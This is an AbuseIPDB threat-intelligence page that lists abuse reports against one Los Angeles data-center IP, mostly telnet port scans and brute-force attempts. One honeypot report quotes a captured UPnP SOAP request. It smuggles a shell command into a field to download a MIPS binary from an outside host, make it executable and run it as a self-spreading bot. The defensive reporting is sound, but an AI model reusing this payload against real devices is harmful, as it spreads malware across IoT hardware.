JavaScript is disabled. Some features of this site may not work properly. For a smoother experience, please enable JavaScript in your browser settings.

AbuseIPDB » 74.48.56.156

74.48.56.156 was found in our database!

This IP was reported 47 times. Confidence of Abuse is 100%: ?

100%

ISP	MULTACOM CORPORATION
Usage Type	Data Center/Web Hosting/Transit
ASN	AS35916
Domain Name	multacom.com
Country	🇺🇸 United States of America
City	Los Angeles, California

IP info including ISP, Usage Type, and Location provided by IPInfo. Updated weekly.

Report 74.48.56.156

Whois 74.48.56.156

IP Abuse Reports for 74.48.56.156:

This IP address has been reported a total of 47 times from 31 distinct sources. 74.48.56.156 was first reported on June 16th 2026, and the most recent report was 4 hours ago.

Recent Reports: We have received reports of abusive activity from this IP address within the last week. It is potentially still actively engaged in abusive activities.

Reporter	IoA Timestamp (UTC)	Comment	Categories
🇺🇸 RAP	2026-06-17 09:47:12 (4 hours ago)	2026-06-17 09:47:12 UTC Unauthorized activity to TCP port 2323. Telnet	Port Scan
🇧🇷 SOC PR	2026-06-17 09:36:51 (4 hours ago)	IPS: Command Injection Over HTTP.	Web App Attack
🇺🇸 MPL	2026-06-17 07:43:32 (6 hours ago)	tcp/23 (3 or more attempts)	Port Scan
🇺🇸 RAP	2026-06-17 07:30:42 (6 hours ago)	2026-06-17 07:30:42 UTC Unauthorized activity to TCP port 23. Telnet	Port Scan
Anonymous	2026-06-17 07:30:29 (6 hours ago)	Honeypot hit: Unauthorized connection attempt detected on 23/TELNET Reported by: https://github.com/ ... show more Honeypot hit: Unauthorized connection attempt detected on 23/TELNET Reported by: https://github.com/sefinek/T-Pot-To-AbuseIPDB show less	Hacking Port Scan
🇳🇱 VMHeaven.io	2026-06-17 07:04:34 (7 hours ago)	Blocked by UFW [52869/tcp] Source port: 42970 TTL: 50 Packet length: 40	Port Scan
🇫🇷 sthoyer.de	2026-06-17 06:54:37 (7 hours ago)	Jun 17 08:54:35 sthoyer kernel: [IPTables-Block] IN=eth0 OUT= MAC=00:50:56:43:00:af:c0:69:11:cd:10:f ... show more Jun 17 08:54:35 sthoyer kernel: [IPTables-Block] IN=eth0 OUT= MAC=00:50:56:43:00:af:c0:69:11:cd:10:f7:08:00 SRC=74.48.56.156 DST=173.212.223.67 LEN=40 TOS=0x00 PREC=0x00 TTL=54 ID=10752 PROTO=TCP SPT=2776 DPT=23 WINDOW=36198 RES=0x00 SYN URGP=0 ... show less	Port Scan
🇬🇧 gbzret4d	2026-06-17 06:33:54 (7 hours ago)	Honeypot [uk-production01]: HTTP/1.1 request on 52869 POST /picdesc.xml User-Agent: Mozilla/4.0 (co ... show more Honeypot [uk-production01]: HTTP/1.1 request on 52869 POST /picdesc.xml User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Accept: / Accept-Encoding: gzip, deflate POST Data: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf zuki; wget http://109.104.153.60/bins/frosty.mips -O zuki; chmod 777 zuki; ./zuki realtek.selfrep`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>; 52869 [2] TCP show less	Hacking Bad Web Bot
🇺🇸 xmission.com	2026-06-17 05:46:17 (8 hours ago)	Blocked by UFW (TCP on 23) Source port: 20716 TTL: 55 Packet length: 40 TOS: 0x08 This report (for ... show more Blocked by UFW (TCP on 23) Source port: 20716 TTL: 55 Packet length: 40 TOS: 0x08 This report (for 74.48.56.156) was generated by: https://github.com/sefinek/UFW-AbuseIPDB-Reporter show less	Port Scan Hacking Brute-Force
🇭🇰 mutebot.net	2026-06-17 05:33:00 (8 hours ago)	SRC=74.48.56.156, PROTO=TCP, SPT=55698, DPT=23	Port Scan
🇺🇸 MPL	2026-06-17 05:26:15 (8 hours ago)	tcp ports: 80,23 (2 or more attempts)	Port Scan
🇺🇸 xmission.com	2026-06-17 04:18:20 (9 hours ago)	Blocked by UFW (TCP on 23) Source port: 62869 TTL: 55 Packet length: 40 TOS: 0x08 This report (for ... show more Blocked by UFW (TCP on 23) Source port: 62869 TTL: 55 Packet length: 40 TOS: 0x08 This report (for 74.48.56.156) was generated by: https://github.com/sefinek/UFW-AbuseIPDB-Reporter show less	Port Scan Hacking Brute-Force
🇺🇸 OceanTreasure	2026-06-17 04:10:14 (10 hours ago)	tcp/23; Legacy Telnet remote access probe (R18) @ 2026-06-17T04:02:28Z	Brute-Force
🇺🇸 RAP	2026-06-17 03:53:46 (10 hours ago)	2026-06-17 03:53:46 UTC Unauthorized activity to TCP port 23. Telnet	Port Scan
🇬🇧 PeravixGroup	2026-06-17 02:43:51 (11 hours ago)	Honeypot detection: Telnet / IoT device brute-force or exploitation attempt on port 23. Severity: ME ... show more Honeypot detection: Telnet / IoT device brute-force or exploitation attempt on port 23. Severity: MEDIUM. Aaran.cloud show less	IoT Targeted Brute-Force

Showing 1 to 15 of 47 reports

Think this IP has been falsely reported? You may request to have the associated reports reviewed and removed. Request Takedown 🚩

Recently Reported IPs:

🇮🇳 2402:3a80:6e7:b514:b0:3e92:b096:ca9a

🇷🇺 194.85.114.202

🇫🇷 185.194.178.6

🇺🇸 44.215.219.236

🇰🇷 218.147.70.239

🇧🇦 185.65.107.14

🇧🇴 181.188.176.242

🇬🇧 178.62.89.9

🇨🇳 223.210.27.53

🇦🇺 203.45.89.51

🇨🇳 58.52.87.175

🇨🇳 36.139.239.23

🇮🇹 5.99.196.202

🇮🇳 135.235.138.43

🇧🇩 103.239.252.132

🇫🇮 74.125.74.158

🇦🇪 5.107.250.191

🇦🇷 190.221.50.123

🇫🇷 91.231.89.233

🇱🇹 81.30.98.44